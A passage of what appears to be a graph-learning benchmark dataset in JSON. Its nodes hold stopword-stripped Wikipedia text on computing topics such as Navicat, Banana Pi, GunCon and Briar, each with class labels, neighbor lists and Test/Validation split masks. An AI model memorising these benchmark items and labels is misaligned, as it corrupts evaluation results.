      8410,
      11488,
      1253,
      9969,
      5363,
      2811,
      10499,
      1804,
      273,
      11539,
      789,
      8474,
      3867,
      10016,
      3873,
      2345,
      3370,
      7983,
      10547,
      823,
      4409,
      7483,
      11075,
      1349,
      4423,
      5457,
      11601,
      11604,
      10590,
      6502,
      8551,
      5492,
      6529,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      11184,
      6075,
      6078,
      9151,
      8136,
      1501,
      6128,
      5619,
      11256,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 11391,
    "label": 2,
    "text": "Open_Handset_Alliance:open handset alliance open handset alliance oha consortium 84 firms develop open standards mobile devices member firms include htc sony dell intel motorola qualcomm texas instruments google samsung electronics lg electronics t-mobile sprint corporation nvidia wind river systems oha established 5 november 2007 led google 34 members including mobile handset makers application developers mobile carriers chip makers android flagship software alliance first developed google 2007 based open-source license competed mobile platforms apple microsoft nokia symbian hp formerly palm samsung electronics intel tizen bada blackberry part efforts promote unified android platform oha members contractually forbidden producing devices based competing forks android time announcement formation open handset alliance november 5 2007 oha also unveiled android open-source mobile phone platform based linux kernel early look sdk released developers 12 november 2007 first commercially available phone running android htc dream also known t-mobile g1 approved federal communications commission fcc 18 august 2008 became available 22 october year members open handset alliance",
    "neighbors": [
      9732,
      5637,
      6,
      11271,
      3082,
      8204,
      8719,
      3089,
      5139,
      7700,
      9244,
      10780,
      11294,
      10785,
      3618,
      6180,
      1578,
      3626,
      5677,
      8237,
      7727,
      8242,
      9266,
      9784,
      1083,
      10303,
      10817,
      1602,
      6212,
      69,
      6213,
      8262,
      8268,
      4685,
      7246,
      3664,
      7253,
      8280,
      3162,
      8285,
      607,
      2658,
      5222,
      10856,
      6763,
      8315,
      8316,
      8829,
      4734,
      4225,
      6276,
      7812,
      1670,
      8326,
      9863,
      9356,
      4238,
      5262,
      10382,
      2195,
      2711,
      10393,
      9882,
      7835,
      6301,
      1694,
      673,
      2723,
      8355,
      8870,
      1191,
      3248,
      7857,
      10933,
      5815,
      2235,
      5822,
      5824,
      196,
      1736,
      2762,
      8907,
      8909,
      4305,
      2259,
      8410,
      10971,
      8413,
      9949,
      8928,
      1761,
      2278,
      1255,
      8423,
      233,
      4841,
      8940,
      10482,
      5875,
      2294,
      8439,
      2809,
      5369,
      7938,
      5892,
      7428,
      4360,
      5384,
      4364,
      1813,
      792,
      280,
      10009,
      10525,
      798,
      4383,
      288,
      5406,
      10016,
      2852,
      8486,
      295,
      10537,
      2862,
      3380,
      823,
      5431,
      6968,
      7991,
      2875,
      3900,
      7992,
      318,
      10045,
      7492,
      3911,
      11079,
      11082,
      332,
      6988,
      10063,
      3409,
      8019,
      2901,
      5975,
      5467,
      4957,
      10080,
      3940,
      9637,
      10599,
      10091,
      6508,
      2925,
      7540,
      1400,
      7548,
      8573,
      1406,
      8066,
      4995,
      900,
      5514,
      9610,
      4493,
      10129,
      5522,
      1427,
      11155,
      9621,
      10645,
      8602,
      7579,
      7068,
      11678,
      2978,
      1444,
      1445,
      5028,
      935,
      424,
      937,
      1959,
      4011,
      4521,
      5546,
      7595,
      9646,
      9660,
      457,
      5067,
      2001,
      8147,
      3542,
      479,
      2529,
      6625,
      8676,
      2021,
      10215,
      1513,
      3561,
      1516,
      5100,
      495,
      3055,
      5105,
      1524,
      2036,
      5620,
      11252,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11392,
    "label": 1,
    "text": "Navicat:navicat navicat series graphical database management development software produced premiumsoft cybertech ltd. mysql mariadb mongodb oracle sqlite postgresql microsoft sql server explorer-like graphical user interface supports multiple database connections local remote databases design made meet needs variety audiences database administrators programmers various businesses/companies serve clients share information partners initial version navicat developed 2001 main target initial version simplify management mysql installations 2008 navicat mysql winner hong kong ict 2008 award year best business grand award best business product gold award navicat cross-platform tool works microsoft windows mac os x linux platforms upon purchase users able select language software eleven available languages english french german spanish japanese polish russian portuguese korean simplified chinese traditional chinese supports linux platform via bundled wine officially released march 2002 windows version navicat mysql became first product offered public premiumsoft subsequently company released two additional versions navicat mysql mac os x linux operating system june october 2003 respectively november 2013 added support mariadb premiumsoft continued expand navicat series releasing navicat postgresql windows october 2005 mac os x june 2006 linux version navicat postgresql would released 3 years later august 2009 august 2008 navicat decided continue product line branch oracle community creating navicat oracle windows mac august following year followed version linux platform oracle version navicat supports latest oracle objects features including directory tablespace synonym materialized view trigger sequence type etc navicat sqlite released windows mac os x simultaneously april 2009 linux version soon followed two months later june year april 2010 navicat premium began including navicat sqlite starting version 9 expand usability navicat premium navicat sql server released november 2010 windows platform mac os x also release sql server version included premium version navicat january 2011 support sql azure added navicat mariadb released november 2013 windows mac os x linux also release mariadb version included navicat premium navicat mysql 2018 navicat started support nosql databases mongodb currently newest addition list server navicat supports new line product called navicat mongodb released july 2018 windows mac os x linux provides native environment mongodb management supports extra features like mapreduce gridfs buckets also release mongodb version included navicat premium 2009 premiumsoft released navicat premium series navicat software combines previous navicat versions single version connect different database types including mysql oracle postgresql simultaneously allowing users data migration cross databases navicat premium version also supports cross-platform administration serving windows mac os x linux april 2010 version 9 navicat premium released added connectivity sqlite database navicat premium allowing navicat premium connect mysql oracle postgresql sqlite single application november 2010 support microsoft sql server added january 2011 sql azure included november 2013 added support mariadb july 2018 added support mongodb navicat essentials officially released november 2011 simple navicat version commercial use essentials editions navicat lack several features found standard/enterprise editions including form view record filtering visual query building data modeling options import export backup data etc navicat data modeler windows version officially released march 2012 mac os x linux version released may 2012 june 2012 standalone product developers create data models mysql sql server oracle postgresql sqlite databases navicat data modeler allows users visually design database structures perform reverse/forward engineer process import table structures odbc data sources generate sql files print models files etc june 2015 added support mariadb databases several features model conversion physical/logical/conceptual model types navicat cloud august 2014 premiumsoft released new product navicat ios database administration tool developed ios features included object viewer designer query builder editor navicat cloud server monitor etc mysql supported first release navicat postgresql ios version released january 2015 september 2017 navicat mariadb ios version released navicat cloud cloud service users synchronize connection settings queries models virtual groups multiple platforms devices user share project others collaborating connection settings queries models navicat monitor officially released april 2018 safe simple agentless remote server monitoring tool supports monitor mysql mariadb cloud databases users access navicat monitor anywhere via web browser main features navicat monitor including real-time instance performance monitoring alert notification query analyzer replications monitoring navicat features include differences features available across operating systems navicat also compatible forks mysql drizzle ourdelta percona navicat supports cloud databases like amazon rds amazon aurora amazon redshift sql azure oracle cloud google cloud alibaba cloud navicat community provides flexible environment navicat users post questions share experiences solutions includes forum discussions blog articles tutorial videos wiki faq",
    "neighbors": [
      8195,
      4236,
      6797,
      10258,
      11030,
      4504,
      7453,
      1950,
      9503,
      5546,
      7339,
      10413,
      5295,
      7983,
      9010,
      823,
      10681,
      6721,
      5960,
      5198,
      7506,
      853,
      9687,
      9177,
      8539,
      10459,
      10340,
      6245,
      8295,
      8683,
      5612,
      2413,
      7022,
      3188,
      8181,
      10873,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 11393,
    "label": 7,
    "text": "GigaSpaces:gigaspaces gigaspaces technologies inc. privately held israeli software company established 2000 headquarters located new york city additional offices europe asia gigaspaces founded 2000 nati shalom company cto also co-founder member israeli grid consortium israeli non-profit organization focused grid computing virtualization cloud computing technology gigaspaces initially focused products provide distributed computing extreme transaction processing february 2012 additional open source platform service called cloudify cloud computing technology made generally available established gigaspaces focused application platforms java .net environments based software architecture pattern space-based architecture borrowing concepts jini javaspaces specifications providing linear scalability stateful high-performance applications using tuple space paradigm gigaspaces extreme application platform xap distributed in-memory data-grid suited high performance low-latency transaction processing well real-time analytics use cases xap performance achieved maximizing utilization ram ssd main data store commonly used speed existing database performance scalability include built-in synchronization rdbs mysql well new databases mongodb cassandra etc xap designed serve system record data maintains therefore supports features databases complex queries transaction support etc among main features support wide range data models starting simple key value api advance aggregation object graph sql support flash provides high speed data store device xap uses combination ram flash handle speed cost requirements flash support known xap memoryxtend provides 50x capacity pure ram number machines memcache used side cache read mostly scenarios provides limited query support high availability transaction support etc xap used speed read write operations serves system record xap provides functionality expected database including transactional support new nosql solutions used alternative database traditional rdbms nosql databases use combination eventual consistency scale-out model handle scalability performance xap hand designed address existing database scalability performance fronting database in-memory data-store in-memory data-store provides high speed data access portion data needs includes built-in synchronization nosql rdbms type databases load data upon recovery keep database sync data gets updated architecture perspective lot similarities xap nosql databases use scale-out model handle scalability unlike nosql xap uses highly consistent transactional data access therefore serve high-speed transactional front-end nosql backend databases days xap used complex event processing real-time business intelligence big data xap replicate data relational database non-relational nosql database enabling data replication across remote sites wan disaster recovery also cloud-ready cloudify open source cloud computing platform service started february 2012 gigaspaces technologies inc. cloudify takes advantage underlying infrastructure iaas recipe-based model enable deployment application onto cloud without change application code architecture recipe provides execution plans installing starting orchestrating monitoring application stack gigaspaces also active participant open source projects compass project cloudify adjusts server usage according demand using load balancing middleware cloudify applies devops principle describing aspect production environment code configuration cloudify designed large degree lessons earlier generation paas solution earlier generation solution took cautious decision bind specifically amazon chose java primary language choice lot maturity cloud market time availability tools frameworks since rapid advancement almost every front changed entire landscape starting cloudify 2.2 cloudify supports chef technology deploy configure application services chef provides multi-platform framework configuring operating systems services complements cloudify recipes handling scope intra-machine configurations using chef lifecycle services simplified chef takes care keeping service configurations up-to-date current specifications defined roles cookbooks cloudify partnered ibm infosphere biginsights cloudify enables biginsights run consistently additional big data services nosql databases simplifying systems deployments consistent management well improving cost efficiency cloud enablement portability support cloudify consistent management refers specifically consistent deployment configuration management across stack applies deployment phase also post-deployment including failover scaling upgrades accomplished cloudify built-in recipe mechanism gigaspaces technologies recognized industry technology contributions several times including third place deloitte fast 50 award 2008 finalists venturebeat cloudbeat showdown 2011 crn 20 coolest cloud platforms development vendors 2012 red herring top 100 europe 2012 well 2012 sd times 100 software development superfecta cloud leader",
    "neighbors": [
      8122,
      4194,
      5956,
      9286,
      5772,
      5677,
      7628,
      50,
      6514,
      3573,
      7802,
      9782,
      5658
    ],
    "mask": "Test"
  },
  {
    "node_id": 11394,
    "label": 2,
    "text": "The_GNOME_Project:gnome project gnome project community behind gnome desktop environment software platform upon based consists software developers artists writers translators contributors active users gnome part gnu project august 2000 gnome foundation set deal administrative tasks press interest act contact point companies interested developing gnome software directly involved technical decisions foundation coordinate releases decide projects part gnome membership open anyone made non-trivial contribution project members foundation elect board directors every november candidates positions must members gnome project holds several community programs events usually tailored local users developers main gathering gnome contributors gnome users developers european conference guadec annual conference used discuss development progress gnome idea guadec events attributed gnome developers users paris meeting 1998 annual asian conference called gnome.asia also exists gnome also participated desktop summit joint conference organized gnome kde communities held europe 2009 2011 among project community programs outreachy established goals increasing women participation improving resources available newcomers getting involved gnome gnome project actively collaborates free software projects previous collaboration efforts ordinarily organized project-to-project basis make collaboration broader freedesktop.org project founded project focuses",
    "neighbors": [
      2955,
      6413,
      10255,
      8848,
      9872,
      3859,
      7450,
      1822,
      6691,
      6694,
      8621,
      9908,
      823,
      3649,
      708,
      3015,
      4177,
      5095,
      4459,
      3189
    ],
    "mask": "Test"
  },
  {
    "node_id": 11395,
    "label": 3,
    "text": "Mitsubishi_740:mitsubishi 740 mitsubishi 740 also known melps 740 series 8-bit cmos microcontrollers microprocessors enhanced mos technology 6502 compatible core based expanded wdc 65c02 ics manufactured mitsubishi electric 1980s 1990s 740 family primarily intended single-chip implementations included optional ram rom eprom on-die additions included variety optional timers input/output lines many features estimated around 600 variations could ordered 2002 mitsubishi hitachi merged chip divisions form renesas technology 2010 nec electronics produce renesas electronics 740 family properly known renesas 740 1984 first 740-series part m50740 appeared 1984 mitsubishi single-chip microcontroller databook manufactured mitsubishi electric research needed determine exact date m50740 announced 1998 reported edn magazine melps 740 family 600 different variations 2002 mitsubishi electric hitachi agreed merge chip operations new 7 billion semiconductor company called renesas technology companies said would move respective semiconductor operations renesas including microcomputer logic analog discrete devices memory flash memory sram etc exception drams renesas technology established april 1 2003 joint venture hitachi 55 mitsubishi electric 45 2009 renesas technology nec electronics reached basic agreement merge april 1 2010 two merged renesas electronics though legacy mitsubishi parts longer manufactured 740 instruction set still alive newer renesas microcontroller series 38000/740 series 7200 series mitsubishi 740 family processor core executes superset 6502 instruction set including many extensions added 65c02 core set new instructions common across 740 family members plus instructions exist specific parts major change 740 family compared 65c02 addition new processor status flag formerly unused bit 6 set 1 x register acted zero page address second operand instructions using zero page addressing allowed program select location zero page act sort second accumulator setting x register point removing address instruction format instance 6502 codice_1 adds contents zero-page memory location addr value accumulator using reduced single byte codice_2 improves code density avoids memory cycle needed read address value flag set cleared using new codice_3 codice_4 instructions members 740 family addresses 0008 0039 zero page set aside special function registers sfr used control various add-ons like built-in i/o ports timers members family also include stack page selection bit spsb within sfr spsb clear set 0 stack relocated zero page instead normal location page one members 740 family zero page implemented on-die instead external ram using spsb allows programs working system entirely single chip appropriate roms many members 740 family include on-dye rom eprom well allowing complete single-chip implementations small programs like device drivers since stack grows downward top page 00ff case requires upper portion page left otherwise unused provide space stack following list new instructions existing instructions new modes 740 family parts w65c02 others apply 740 family w65c02 opposed original 65c02 added several new instructions originally designed rockwell semiconductor included instructions set clear referred reset clear single bits memory well instructions branch bits set clear retained 740 family however w65c02 also included test-and-set/reset instructions tested bit set clear setting z flag appropriately either setting clearing bit useful waiting certain flags appear resetting handling flag instructions included 740 additionally original 65c02 codice_5 single-instruction store zero retained functionality partially replaced ldm w65c02 also added several new instructions low-power operation may may available members 740 series following instructions available m50740a m50740asp m50741 m50752 m50757 m50758 parts following instructions available m50752 m50757 m50758 parts following instructions available m37450 parts following instructions available m50740a m50740asp m50741 m50752 m50757 m50758 parts parts n't internal eeprom rom thus require external eeprom rom hold firmware parts pins top package allow eprom plugged parts expensive primarily used development purposes parts internal eprom memory available either otp one-time programmable eprom eraseable window eprom commercial temperature extended temperature m50734 rom/ram-less device includes peripherals uart serial i/o a/d watchdog timer vcu 32 parallel i/o ports choice 8 16-bit timers manage real time tasks instruction set superset 6502 microprocessor incorporated particular ic following m50734sp/fp m50734sp/fp-10 unique cmos lsi microprocessor uart clocked serial i/o a-d converter vcu watchdog timer 32-bit parallel i/o arranged around m5040 cpu core since m50734 multiple internal timers real-time control ideal controlling office automation equipment printers typewriters plotters copy machines fax handy word processors use cmos process enables low power consumption making m50734sp also suitable applications battery-powered operation required difference m50734sp m50734fp m50734sp-10 m50734fp-10 lies package difference m50734sp/fp m50734sp/fp-10 lies maximum clock frequency 1990s clone m50959 manufactured russia designation kf1869ve1",
    "neighbors": [
      7170,
      6925,
      10767,
      1170,
      7445,
      664,
      7323,
      10784,
      4385,
      4773,
      7589,
      9638,
      682,
      3630,
      11054,
      2224,
      11314,
      10945,
      3010,
      7235,
      8900,
      1478,
      9928,
      6607,
      3157,
      6485,
      9685,
      4569,
      10969,
      5862,
      9964,
      11374,
      6639,
      1776,
      5617,
      7281,
      7282,
      7284,
      10351,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11396,
    "label": 3,
    "text": "Banana_Pi:banana pi banana pi line low-cost credit card-sized single-board computers produced chinese company shenzhen sinovoip co. ltd hardware design banana pi computers influenced raspberry pi banana pi compatible raspberry pi boards banana pi also run netbsd android ubuntu debian arch linux raspbian operating systems though cpu complies requirements debian codice_1 port uses allwinner soc system chip mostly covered linux-sunxi port banana pi open-source hardware software platform designed assist banana-pi.org banana pi bpi-m1 business card-sized low-power single-board computer featuring high performance allwinner dual-core soc 1 ghz 1gb ddr3 sdram gigabit ethernet sata usb hdmi connections run variety operating systems including android lubuntu ubuntu debian raspbian key features bpi official wiki banana pi bpi-m1 wiki page br neither banana pi shenzhen sinovoip co. ltd. direct relationship raspberry pi foundation though similarities clear linux user developer consider direct clone considerable evolution whilst linux.com similarly sees clone improved performance board layout similar raspberry pi board though 10 larger relative spacing connectors varies raspberry pi accessories fit result banana bpi-m1+ credit-card-sized low-power single-board computer note banana pi bpi-m2+ released april 2016 allwinner h3 soc quad-core cpu on-board wifi module runs android debian ubuntu raspbian images raspberry pi banana pi pbi-m2 hardware 1ghz arm7 quad-core processor 1gb ddr3 sdram 8gb emmc flash board sdio wifi module board note banana pi bpi-m2 zero low-power single-board computer featuring high-performance allwinner quad-core soc 1.2 ghz 512m ddr3 sdram usb wifi bluetooth mini hdmi bpi-m2 zero size raspberry pi zero w use raspberry pi zero w case key features banana pi gpio headers raspberry pi 1 model b seen banana pi bpi-p2 zero low-power single-board computer featuring high-performance allwinner quad-core soc 1.2 ghz 512 mb ddr3 sdram usb wifi bluetooth mini hdmi key features 3 differences bpi-m2 zero rest hardware design bpi-m2 zero software banana pi bpi-m2 ultra bpi-m2u open source hardware platform uses allwinner r40 system-on-chip supports wifi+bt board supports sata interface board banana pi pbi-m2 ultra hardware quad core arm cortex a7 armv7 cpu 2gb ddr3 sdram 8g emmc flash board gigabit ethernet port built-in 3.7v li-ion battery charging circuit run android smoothly supports 1080p video 40 pin gpio header pin-compatible raspberry pi note banana pi bpi-m2 berry bpi-m2b open source hardware platform uses allwinner v40 system-on-chip supports wi-fi bluetooth board banana pi m2 berry hardware 32 bit quad core arm cortex a7 1.2 ghz cpu 1gb ddr3 sdram emmc gigabit ethernet port banana pi m2 berry series run android debian ubuntu raspbian os run android smoothly resolution hd gpu needed since r40 v40 chips pin-to-pin compatible swapped bpi-m2 ultra bpi-m2 berry versions resulting two hybrid products note banana pi bpi-m2 magic bpi-m2m single-board computer designed internet-of-things applications uses allwinner r16 system chip also use allwinner a33 chip board used home entertainment home automation high wireless performance etc br note banana pi m3 open source hardware platform octa-core version banana pi supports onboard wi-fi sata port banana pi m3 able run android 5.1.1 debian ubuntu raspberry pi os banana pi m3 hardware 2ghz arm7 octa-core processor 2gb lpddr3 sdram gigabit ethernet port gpio compatible raspberry pi b+ note banana pi bpi-m4 uses realtek rtd1395 system chip features 1 gb ram 8 gb emmc also onboard wifi b/g/n/ac bt 4.2 ports side bpi-m4 4 usb 2.0 ports 1 usb type c port 1 hdmi port 1 audio jack supports m.2 key e pcie 2.0 interface rtd1395 equipped high-performance quad-core cpu arm cortex-a53 512k l2 cache embedded rtd1395 also integrates arm mali-470 graphic processing unit gpu accelerate 2d 3d graphics processing acceleration osd 2k user interface built-in streaming engine rtd1395 provides commonly used drawing functions cpu dedicated applications functions rtd1395 dedicated manipulating decoding video streams vaious formats.e.g decoding 4kx2k h.265 full hd mpeg1/2/4/h.264/h.264 mvc avc/vc-1 vp8 vp9 avs avs plus hd jpeg etc video dsp also handle encoding full hd h.264 format video decoding encoding run simultaneously note note banana pi bpi-f2 uses freescale i.mx6 system chip i.mx6 arm cortex-a9 mpcore 4×cpu processor trustzone ths first banana pi board design freescale soc note banana pi bpi-s64 core uses actions s700 system chip s700 soc arm cortex-a53 quad-core cpu mali450 mp4 gpu bpi-s64 core 2gb lpddr3 8g emmc flash board bpi-s64 core modules small enough fit kinds hardware addition s64 core also provides i/o boards gpio ports well usb microusb csi dsi hdmi microsd many interfaces note banana pi r1 300mbit/s wireless 802.11n router wired wireless network connections designed specifically smart home networking use 2t2r mimo technology two detachable antennas r1 dual core system runs smoothly android 4.2.2 gigabit ethernet port sata socket supports games 1080p high definition video output note banana pi bpi-r2 highly integrated multimedia network router used high wireless performance home entertainment home automation etc bpi-r2 integrates quad-code arm cortex-a7 mpcore operating 1.3 ghz router also includes variety peripherals including hdmi tx mipi dsi pcie2.0 usb2.0 otg usb3.0 port sata port，5 gbit/s port gigabit ethernet port 802.11a/b/g/n wifi bt4.1 board also supports 802.11ac/n wlan connection mini pci-e port bpi-r2can run android 5.1 smoothly time entry board work properly known linux distribution size banana pibpi-r2 bpi-r1 easily run games supports 1080p high definition video output note banana pi bpi-r64 highly integrated multimedia network router used high wireless performance home entertainment home automation etc banana pi r64 router based development board run variety open source operating systems including openwrt linux 4 gigabit lan ports 1 gigabit wan ac wifi ap function key features note banana pi bpi-w2 highly integrated multimedia network router used high wireless performance home entertainment home automation etc bpi-w2 integrates quad-core arm cortex-a53 mpcore operating 1.5 ghz router also includes variety peripherals including hdmi rx/tx mini dp pcie2.0 pcie1.1 sdio m.2 interface usb2.0 usb3.0 port sata port，2 gbit/s gigabit ethernet port also supports 802.11ac/n wlan connection thru pci-e port bpi-w2 run android 6.0 smoothly also run openwrt debian raspbian oses size banana pi bpi-w2 bpi-r2 easily run 1080p high-definition video output gpio compatible raspberry pi 3 note bpi-d1 one smallest open-source development boards currently market built-in hd mini camera 36mm w x36mm l weighing 10g claimed much smaller boards comparable features board specially suited mini-cam applications providing high-resolution image quality video still capture 1280x720p video capture rate 30 fps banana pi-d1 designed provide set multimedia tools one small package run external battery source features d1 include hd mini-cam audio sensor microphone cpu gpio wi-fi note banana pi-g1 integrated ieee 802.11 b/g/n wi-fi wireless network ieee 802.15.4 zigbee ieee 802.11-2007 standard bluetooth low energy 4.0 development board three wireless protocols used together exchange different transport protocols wireless protocol supported single-chip soc facilitate internet things iot projects wi-fi uses ti cc3200 high-performance arm cortex-m4 wireless soc internally integrated tcp/ip protocol stack allows simple connection internet using bsd socket zigbee uses ti cc2530 integrates wireless capabilities enhanced 8051 core soc years improvement quite mature stable ti z-stack achieved zigbee 2007/pro use 16 short address use 64-bit long address communication face large local interconnect systems providing advanced security encryption mesh network structure support bluetooth 4.0 ble uses ti cc2540/1 integrated ble stack enhanced 8051 core low-power wireless soc present mobile phones support bluetooth 4.0 wearable device mobile interactive accessories cc2540 easily completed meanwhile bpi g1 also incorporates high-performance stm32 arm cortex-m3 microcontroller help dealing time-consuming data transit three wireless soc coordinated therefore banana pi g1 supports wide range internet things diy wireless projects note powered axp209 power management unit banana pi able output 1.6a means users drive external hdd without extra power supply banana pi board similar cubieboard2 banana pi m2 bpi-m2 credit card-sized low-power single-board computer quad core version banana pi supports board wi-fi banana pi m2 series runs android debian ubuntu raspberry pi images images banana pi m2 hardware 1ghz arm7 quad-core processor 1gb ddr3 sdram gigabit ethernet port banana pi m2 size banana pi m1 supports 1080p video output gpio compatible raspberry pi b+ note banana pi pro credit card-sized low-power single-board computer developed china lemaker team goal promoting stem science technology engineering mathematics education schools like smaller sibling banana pi pro concept heavily influenced raspberry pi however banana pro provides various enhancements prior designs banana pro allwinner a20 system chip soc includes arm cortex-a7 dual-core armv7-a 1 ghz mali-400 mp2 gpu 1gb ddr3 sdram banana pro uses microsd card booting os also includes sata 2.0 interface allow connection hard disk additional storage however boot hard disk differences banana pi include on-board wi-fi 802.11 b/g/n ap6181 integrated composite video audio output 3.5 mm trrs jack makes space 40-pin extension header",
    "neighbors": [
      3585,
      11267,
      644,
      7300,
      392,
      9610,
      6925,
      1682,
      11282,
      2838,
      666,
      4124,
      798,
      1442,
      7595,
      8237,
      7983,
      3511,
      823,
      1849,
      8250,
      9913,
      10433,
      6978,
      7234,
      10945,
      6981,
      11080,
      2635,
      11221,
      2524,
      1377,
      2788,
      7913,
      5356,
      9581,
      9964,
      1776,
      499
    ],
    "mask": "None"
  },
  {
    "node_id": 11397,
    "label": 4,
    "text": "William_Lutwiniak:william lutwiniak william lutwiniak november 24 1919 – january 24 1992 american crossword constructor also known work cryptologist national security agency composed total 8,413 puzzles first five thousand composed 1965 1985 hobby lutwiniak born jersey city new jersey lutwiniak began solving crosswords 12 sold first puzzle new york herald-tribune 15 later considered puzzle bit prophetic contained word cryptographical 16 subscription journal american cryptogram association also joined national puzzlers league nom live devil five years followed regular participant aca activities brought attention william friedman friedman invited pursue advanced training cryptography join signal intelligence service lutwiniak february 1 1941 lutwiniak worked arlington hall solomon kullback aftermath attack pearl harbor point became concerned would drafted went munitions building asked colonel harold hayes advice hayes told go particular recruiting station enlist lutwiniak immediately assigned work harold hayes munitions building returned hayes promoted sergeant could skip basic training following october promoted staff sergeant technical sergeant war lutwiniak stopped creating solving crosswords things serious mid-1960s however found margaret farrar crossword copy new york times discovered able solve easily expected subsequently began selling crosswords one early puzzles used cryptic crossword-style cluing center gravity avi fourth july controversial creating lutwiniak words 'big uproar newspaper subsequently print explanation clues meant 1961 headed nsa a5 unit specialized soviet codes later became publisher cryptolog one nsa internal magazines also contributed articles puzzles 1985 joined washington post crossword co-editor sunday magazine became involved crossword culture 1987 attended stanley newman-run crossword tournament baltimore created 15-by-15 puzzle stage 15 minutes based suggestions audience upon retiring national security agency 1981 lutwiniak awarded national intelligence medal achievement 1991 crossw rd magazine named crossword puzzle person year",
    "neighbors": [
      7887,
      5310,
      4007
    ],
    "mask": "Test"
  },
  {
    "node_id": 11398,
    "label": 3,
    "text": "GunCon:guncon often styled guncon portmanteau gun controller known g-con europe family gun peripherals designed namco playstation consoles original controllers used traditional light gun technology newer controllers use led tracking technology first guncon npc-103 g-con 45 europe sony id sleh-00007 bundled playstation conversion time crisis make gun affordable consumers force feedback feature time crisis arcade gun omitted additional fire button included lieu releasing pedal controller game ducking mechanic second version guncon known guncon 2 npc-106 g-con 2 europe bundled playstation 2 conversion time crisis ii time crisis 3 time crisis 4 came playstation 3 bundled guncon 3 nc-109 g-con 3 europe japan three guncon models also available sale separate accessory outside game bundle prior guncon konami justifier first light gun peripheral playstation games support exception north american localization elemental gearbolt maximum force games support justifier compatible guncon vice versa guncon controller known g-con 45 europe uses cathode ray timing method determine barrel aimed screen trigger pulled features button barrel either side gun buttons b performing function auxiliary in-game control take cover reload time crisis controller released black japan gray eventually orange europe north america controller compatible playstation 2 guncon titles compatible playstation 3 due lack controller ports many games support allow b buttons swapped making comfortable right left-handed players guncon 2 g-con 2 europe features smaller body well rounded shape compared original guncon side buttons b moved rearward position directly trigger two new smaller buttons select start added left side shaft prominent additions second guncon model d-pad back gun barrel c button added bottom gun handle new buttons served open new gameplay opportunities character movement dino stalker ability use two guns time crisis ii gun uses usb connection opposed playstation controller port guncon 1 also hooks video signal console either composite video signal component video controller released black japan blue europe orange north america compatible original playstation titles playstation 3 titles guncon 2 compatible games work older models playstation 3 featuring form hardware-based playstation 2 backwards compatibility guncon 3 utilizes two infrared leds markers placed left right sides screen image sensor muzzle tracks markers reference points determining gun pointing screen opposed guncon guncon 2 compatible crt-based displays guncon 3 supports wide variety display types including lcd plasma guncon 3 features sub-grip mounted underneath barrel extending left side use left hand sub-grip analog stick two shoulder buttons like modern gamepad back end gun barrel another analog stick two buttons b1 b2 underneath another two buttons c1 c2 placed along left side barrel analog sticks allow player play first-person shooting games manual aiming/firing light gun regards appearance japanese guncon 3 controllers feature black coloring though due us toy gun laws us/pal release guncon 3 controllers molded bright orange plastic controller criticized uncomfortable left-handed gamers guncon 2 ps2 games compatible original guncon unless game utilizes extra buttons guncon 2 iguncon ios released july 21 2011 allows players use iphone ipod touch similar fashion guncon time crisis 2nd strike ios exclusive entry time crisis series iguncon along time crisis 2nd strike pulled app store march 2015",
    "neighbors": [
      643,
      9091,
      3077,
      9732,
      10761,
      6799,
      9508,
      9512,
      684,
      306,
      1587,
      1346,
      1091,
      6732,
      10316,
      6873,
      4060,
      607,
      359,
      8937,
      3824,
      5746,
      7801,
      8316,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11399,
    "label": 7,
    "text": "Briar_(software):briar software briar open-source software communication technology intended provide secure resilient peer-to-peer communications centralized servers minimal reliance external infrastructure connections made bluetooth wifi internet via tor private communication end-to-end encrypted relevant content stored encrypted form participating devices long term plans project include blogging crisis mapping collaborative document editing initial target audience briar includes activists journalists civil society plans make system simple enough help anyone keep data safe ability function absence internet infrastructure may also make project valuable disaster response aid organisations developers working open humanitarian initiative taarifa ultimately developers aim create system simple use whatsapp secure pgp keeps working somebody breaks internet briar source code published free software distributed terms gplv3 license audited cure53 spoken highly report delivered recommended given second audit development completes",
    "neighbors": [
      610,
      10021,
      5382,
      11211,
      7983,
      8758,
      5978
    ],
    "mask": "None"
  },
  {
    "node_id": 11400,
    "label": 4,
    "text": "Software-defined_protection:software-defined protection software-defined protection sdp computer network security architecture methodology combines network security devices defensive protections leverage internal external intelligence sources sdp infrastructure designed modular scalable secure sdp architecture partitions security infrastructure three interconnected layers enforcement layer inspects traffic enforces protection within well-defined network segments control layer generates security policies deploys protections enforcement points management layer orchestrates infrastructure integrates security business processes sdp architecture supports traditional network security access control policy requirements well threat prevention required enterprises implementing technologies mobile computing software-defined networking sdn enforcement layer sdp enables organizations design segmented networks implement physical virtual security enforcement points based upon segmentation execute protection logic prescribed network segments sdp incorporates principal segmentation enforcement layer segmentation divides network compartments different security characteristics based upon segment requirements security controls established threat containment recovery enforcement points platforms executing protections must implemented boundaries segments enforce defined protection logic enforcement points may implemented network security gateways host-based software mobile device applications virtual machines cloud control layer core sdp architecture role generate protections deploy execution appropriate enforcement points within enforcement layer develop appropriate protections control layer relies upon repositories data include knowledge organization information systems access control knowledge data assets classifications data protection knowledge threats threat prevention security solutions commonly implemented within control layer include firewall anti-virus application control threat emulation anti-bot anti-spam email security data loss prevention dlp intrusion prevention systems ips systematic mapping protective controls associated risk segment assets within enforcement layer organizations deliver multi-layer protection attacks management layer serves interface network administrators two layers sdp infrastructure layer supports enterprise segmentation enables definition access data control policies activation threat prevention separately management layer also provides ability delegate management specific administrators work simultaneously management layer provides visibility happening network supports proactive incident response provides intelligence required tailor security controls organization",
    "neighbors": [
      4194,
      2213,
      8998,
      10245,
      3944,
      11365,
      939,
      6124,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 11401,
    "label": 4,
